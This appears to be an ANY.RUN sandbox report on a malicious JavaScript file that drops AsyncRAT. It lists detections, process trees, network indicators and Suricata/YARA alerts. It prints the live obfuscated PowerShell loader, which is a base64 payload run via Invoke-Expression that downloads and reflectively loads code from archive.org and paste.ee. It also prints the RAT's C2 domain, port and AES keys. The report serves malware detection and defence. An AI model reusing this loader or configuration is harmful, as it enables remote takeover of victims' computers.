File name:

0..js

Full analysis: https://app.any.run/tasks/14909b82-edfd-4c3c-a613-989a84d3538d
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 09:28:39
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
rat
asyncrat
remote
netreactor
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

E9C94D33539BFA16BC86D65AC6B49705

SHA1:

32264EB4057227A78F91F1AAD342CD6FAC3533DB

SHA256:

E4846D770EB82608075D3E2D6C3A6754AE5E086327F5F9EA7FF6435B4B042AAD

SSDEEP:

384:ereTrRkrQ7eqrRxrQBeTrRkrQ7eqrRxrQrrxrwsrjrrqrwrroBeerSxrL7eer0J/:F+PMD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1912)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1912)

    • ASYNCRAT has been detected (SURICATA)

      • jsc.exe (PID: 5728)

    • ASYNCRAT has been detected (YARA)

      • jsc.exe (PID: 5728)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1912)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5124)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 5124)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 5124)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 5124)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5124)

    • Connects to unusual port

      • jsc.exe (PID: 5728)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 672)

    • Contacting a server suspected of hosting an CnC

      • jsc.exe (PID: 5728)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1912)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1912)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 5124)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 1912)

    • Executes script without checking the security policy

      • powershell.exe (PID: 1912)

  • INFO

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1912)

    • Checks proxy server information

      • powershell.exe (PID: 1912)

    • Reads the computer name

      • jsc.exe (PID: 5728)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1912)

    • Reads the machine GUID from the registry

      • jsc.exe (PID: 5728)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1912)

    • Checks supported languages

      • jsc.exe (PID: 5728)

    • Reads the software policy settings

      • jsc.exe (PID: 5728)
      • slui.exe (PID: 4272)

    • .NET Reactor protector has been detected

      • jsc.exe (PID: 5728)

    • Disables trace logs

      • powershell.exe (PID: 1912)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(5728) jsc.exe
C2 (1)arannsasaaransasaturituri2024.duckdns.org
Ports (1)3009
Version0.5.7B
Botnet202512
Options
AutoRunfalse
MutexMutex_6SI8Admxn
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQAKxLlAkF1WRT8tAExBlQyzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwOTIwMTQyNzUwWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKrrWexesJSLqGeYC6kTxL6e4fbMdbCF6T1opNgSYFlyavRm733h8x2GXmzipr8dl/UHWmWcPmk8...
Server_SignatureaUJYEXRD16PdjWsVGUoEDC/1J06mt5QZ1omtU2iI7pPlXs4zpHUCvJet1MDT2ajfim6gAJ+FYra971v3kb3+G2GEGbjwGZ1oOYVZ8DwiaDfw7QgxRiImmT0I0CUO9+spPhTADC95gzwiceAy8MwW4b58aslG8KpEtWUQPIIJmuoj3wOLWF61XueIg6Z4HxgoYVAMxuEwwKXMqvvVSZS72Erwsjl3L+mWIhlTeZmfeNfUUxYeFK1c2dA+Uy3ZFQjyWdMUC3C1lF9ygLcF+yWNoKgG3BurqF67fO2gKbULXKwf...
Keys
AESdcdac48667980a3746d51f0c2cd7e93fe6fe063bf3f33d65e9fabcd2e3d8f36c
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
10
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs #ASYNCRAT jsc.exe svchost.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
672"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\Aleichem.js"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1228C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
1912"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$redliche = 'JAByAG8AdQBnAGgAdwByAG8AdQBnAGgAdAAgAD0AIAAnADAALwBBAFgAaQBBAHoAUwBRAEwALwBkAC8AZQBlAC4AZQAjAHMAYQBwAC8ALwA6AHMAcAAjACMAaAAnADsAJABmAGwAZQBnAG0AIAA9ACAAJAByAG8AdQBnAGgAdwByAG8AdQBnAGgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAYQBkAGgAZQByAGUAbgB0AGwAeQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAYQBuAHQAaQBtAGEAdAByAG8AaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAbgB0AGkAbQBhAHQAcgBvAGkAZAAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABpAHQAegBpAGIAdQAgAD0AIAAkAGEAbgB0AGkAbQBhAHQAcgBvAGkAZAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABhAGQAaABlAHIAZQBuAHQAbAB5ACkAOwAkAHMAdQByAHYAZQB5AG8AcgBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQB0AHoAaQBiAHUAKQA7ACQARQB1AHAAaABvAHIAYgBpAHUAbQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAQQBtAG8AcgBpAHQAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABmAG8AcgBnAGUAcwAgAD0AIAAkAHMAdQByAHYAZQB5AG8AcgBzAC4ASQBuAGQAZQB4AE8AZgAoACQARQB1AHAAaABvAHIAYgBpAHUAbQApADsAJABzAHQAYQBrAGUAcgAgAD0AIAAkAHMAdQByAHYAZQB5AG8AcgBzAC4ASQBuAGQAZQB4AE8AZgAoACQAQQBtAG8AcgBpAHQAZQApADsAJABmAG8AcgBnAGUAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAHMAdABhAGsAZQByACAALQBnAHQAIAAkAGYAbwByAGcAZQBzADsAJABmAG8AcgBnAGUAcwAgACsAPQAgACQARQB1AHAAaABvAHIAYgBpAHUAbQAuAEwAZQBuAGcAdABoADsAJAB0AGUAeAB0AHUAcgBlAGwAZQBzAHMAIAA9ACAAJABzAHQAYQBrAGUAcgAgAC0AIAAkAGYAbwByAGcAZQBzADsAJABtAGkAbAB0AG8AbgBpAGMAIAA9ACAAJABzAHUAcgB2AGUAeQBvAHIAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABmAG8AcgBnAGUAcwAsACAAJAB0AGUAeAB0AHUAcgBlAGwAZQBzAHMAKQA7ACQAYwBsAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAG0AaQBsAHQAbwBuAGkAYwApADsAJABnAGEAcgByAG8AdAB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAGwAYQBuAG4AaQBzAGgAKQA7ACQAdwBoAGUAdQBnAGgAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABmAGwAZQBnAG0ALAAnADEAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBBAGwAZQBpAGMAaABlAG0AJwAsACcAagBzAGMAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAagBzACcALAAnACcALAAnACcALAAnACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$empathizer = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($redliche));Invoke-Expression $empathizer;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
2908C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
4272"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
5124"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\0..jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
5728"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
jsc.exe
Version:
14.8.9037.0 built by: NET481REL1
AsyncRat
(PID) Process(5728) jsc.exe
C2 (1)arannsasaaransasaturituri2024.duckdns.org
Ports (1)3009
Version0.5.7B
Botnet202512
Options
AutoRunfalse
MutexMutex_6SI8Admxn
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQAKxLlAkF1WRT8tAExBlQyzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwOTIwMTQyNzUwWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKrrWexesJSLqGeYC6kTxL6e4fbMdbCF6T1opNgSYFlyavRm733h8x2GXmzipr8dl/UHWmWcPmk8...
Server_SignatureaUJYEXRD16PdjWsVGUoEDC/1J06mt5QZ1omtU2iI7pPlXs4zpHUCvJet1MDT2ajfim6gAJ+FYra971v3kb3+G2GEGbjwGZ1oOYVZ8DwiaDfw7QgxRiImmT0I0CUO9+spPhTADC95gzwiceAy8MwW4b58aslG8KpEtWUQPIIJmuoj3wOLWF61XueIg6Z4HxgoYVAMxuEwwKXMqvvVSZS72Erwsjl3L+mWIhlTeZmfeNfUUxYeFK1c2dA+Uy3ZFQjyWdMUC3C1lF9ygLcF+yWNoKgG3BurqF67fO2gKbULXKwf...
Keys
AESdcdac48667980a3746d51f0c2cd7e93fe6fe063bf3f33d65e9fabcd2e3d8f36c
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
6028\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
7012\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Total events
0
Read events
0
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
672cmd.exeC:\Users\Public\Downloads\Aleichem.jstext
MD5:37AD3EC4624229628934EAE6FF69C70C
SHA256:DB8E6DD12B637AF25913EE14CECAC7147131A284D7E50B7EF70DEE1EC2832CB4
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fxjc5ulf.dkx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_t43ne3yu.0is.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:D2CC9092E98EBCD326AA475FB6C1CBF5
SHA256:0F49044DEFA8D41D0E95FF7A584CB28659F78BFCBF8F75BEBA2A3C4147EB09CD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
26
DNS requests
20
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.32.238.107:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2772
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2772
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5496
MoUsoCoreWorker.exe
23.32.238.107:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5496
MoUsoCoreWorker.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1912
powershell.exe
207.241.224.2:443
archive.org
INTERNET-ARCHIVE
US
whitelisted
6700
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1912
powershell.exe
207.241.227.90:443
ia601700.us.archive.org
INTERNET-ARCHIVE
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 23.32.238.107
  • 23.32.238.112
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
archive.org
  • 207.241.224.2
whitelisted
ia601700.us.archive.org
  • 207.241.227.90
whitelisted
login.live.com
  • 2.23.181.156
whitelisted
ocsp.digicert.com
  • 23.63.118.230
whitelisted
paste.ee
  • 23.186.113.60
shared

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
1912
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
5728
jsc.exe
Domain Observed Used for C2 Detected
REMOTE [ANY.RUN] AsyncRAT SSL certificate
5728
jsc.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
5728
jsc.exe
Domain Observed Used for C2 Detected
ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
5728
jsc.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0..js